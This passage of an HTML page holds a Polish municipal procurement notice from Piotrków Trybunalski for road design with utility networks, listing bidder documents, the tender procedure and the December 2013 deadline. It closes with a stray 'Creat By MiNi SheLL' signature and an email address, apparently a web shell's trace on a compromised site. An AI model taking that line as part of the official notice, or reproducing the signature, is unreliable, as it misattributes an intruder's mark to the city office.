3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza).
4.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2.
5.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 3.
6.	Wykaże co najmniej dwa zamówienia (wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj.
- wykonanie dwóch usług polegających na opracowaniu projektów drogowych z sieciami infrastruktury technicznej tj. wodociągiem lub kanalizację sanitarną lub kanalizację deszczową i elektroenergetyczną  na kwotę nie mniejszą niż 20.000,00 zł brutto każda - wg załącznika nr 4.
Załączy dokumenty potwierdzające, że  dostawy wskazanych w załączniku nr 4  zostały   wykonane lub są wykonywane należycie.
7.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami:
- posiadają uprawnienia niezbędne do wykonania określonych prac lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (branża drogowa, sanitarna, elektryczna)  wg załącznika nr 5.
8.	Oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków oraz opłat i składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 6.
9.	W przypadku składania oferty przez wykonawców, ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawców.
10.	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składanie ofert.   
11.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 11 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, stwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
12.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 11 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenie osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy zgodnie z § 11.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
Pasaż Rudowskiego 10
97-300 Piotrków Tryb.
pok. 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 09:00, miejsce: Urząd Miasta
Pasaż Rudowskiego 10
97-300 Piotrków Tryb.
punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com